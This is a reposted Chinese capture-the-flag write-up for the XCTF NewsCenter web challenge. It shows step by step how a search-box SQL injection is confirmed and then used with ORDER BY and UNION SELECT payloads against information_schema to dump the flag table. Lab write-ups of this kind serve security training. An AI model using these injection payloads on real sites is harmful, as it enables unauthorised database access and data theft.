首页 最新 热门 推荐

  • 首页
  • 最新
  • 热门
  • 推荐

攻防世界 - Web - Level 2 | NewsCenter

  • 25-02-16 18:01
  • 3245
  • 5673
blog.csdn.net

关注这个靶场的其它相关笔记:攻防世界(XCTF) —— 靶场笔记合集-CSDN博客

0x01:考点速览

本关考察的是搜索型的 SQL 注入漏洞,需要提前知道以下知识点:

  • 字符型 SQL 注入的方式(搜索型的和它一样)

  • 搜索型 SQL 模板:select * from 表名 where 字段 like "%$_POST['search']%"

0x02:Write UP

进入靶场,是一个叫作 Hacker News 的页面(进入之后报错很正常,如果是校园网的话,建议用手机流量,刷新一下即可):

页面写的不错,一个搜索框,下面是显示 News,第一反应就是搜索型注入,搜索型的 SQL 语句模板如下:

 select * from 表名 where 字段 like "%$_POST['search']%";

测试方法和字符型差不多:

  1.  测试语句01:*" or 1=1;#" -> 返回空 -> 说明引号闭合失败 -> * 号表格里面肯定是没有的,但是 or 1=1 如果成功执行,应该会返回所有结果,但现实是返回为空,所以引号闭合失败
  2.  测试语句02: *' or 1=1;#' -> 返回所有信息 -> 引号闭合成功
  3.  ​
  4.  -> 后端语句: select * from 表名 where 字段 like '%$_POST["search"]%';
  5.  -> 注入模板: *' 注入代码 ;#'

测试后端返回字段数,发现字段为 3:

  1.  *' order by 1;#' -> 页面返回正常
  2.  *' order by 2;#' -> 页面返回正常
  3.  *' order by 3;#' -> 页面返回正常
  4.  *' order by 4;#' -> 页面报错
  5.  ​
  6.  -> 优化注入模板: *' union select 1,2,(注入代码) ;#'

下面就是查表啥的了,这里就不放出测试的了,直接给出语句以及返回结果:

  1.  获取当前数据库名:
  2.  -> *' union select 1,2,(select database()) ;#'
  3.  -> news
  4.  ​
  5.  获取 news 数据库中的数据表名:
  6.  -> *' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) ;#'
  7.  -> news,secret_table
  8.  ​
  9.  获取 news 数据表中的字段名:
  10.  -> *' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="news") ;#'
  11.  -> id,title,content
  12.  ​
  13.  获取 secret_table 数据表中的字段名:
  14.  -> *' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="secret_table") ;#'
  15.  -> id,fl4g

经过上面的语句我们可以确定目标数据库的结构如下:

  1.  - news
  2.   - news
  3.     -> id
  4.     -> title
  5.     -> content
  6.   - secret_table
  7.     -> id
  8.     -> fl4g

获取 secret_table 中的 fl4g 列所有内容:

 *' union select 1,2,(select group_concat(fl4g) from secret_table) ;#'

注:本文转载自blog.csdn.net的Blue17 :: Hack3rX的文章"https://blog.csdn.net/m0_73360524/article/details/144497492"。版权归原作者所有,此博客不拥有其著作权,亦不承担相应法律责任。如有侵权,请联系我们删除。
复制链接
复制链接
相关推荐
发表评论
登录后才能发表评论和回复 注册

/ 登录

评论记录:

未查询到任何数据!
回复评论:

分类栏目

后端 (14832) 前端 (14280) 移动开发 (3760) 编程语言 (3851) Java (3904) Python (3298) 人工智能 (10119) AIGC (2810) 大数据 (3499) 数据库 (3945) 数据结构与算法 (3757) 音视频 (2669) 云原生 (3145) 云平台 (2965) 前沿技术 (2993) 开源 (2160) 小程序 (2860) 运维 (2533) 服务器 (2698) 操作系统 (2325) 硬件开发 (2491) 嵌入式 (2955) 微软技术 (2769) 软件工程 (2056) 测试 (2865) 网络空间安全 (2948) 网络与通信 (2797) 用户体验设计 (2592) 学习和成长 (2593) 搜索 (2744) 开发工具 (7108) 游戏 (2829) HarmonyOS (2935) 区块链 (2782) 数学 (3112) 3C硬件 (2759) 资讯 (2909) Android (4709) iOS (1850) 代码人生 (3043) 阅读 (2841)

热门文章

101
推荐
关于我们 隐私政策 免责声明 联系我们
Copyright © 2020-2025 蚁人论坛 (iYenn.com) All Rights Reserved.
Scroll to Top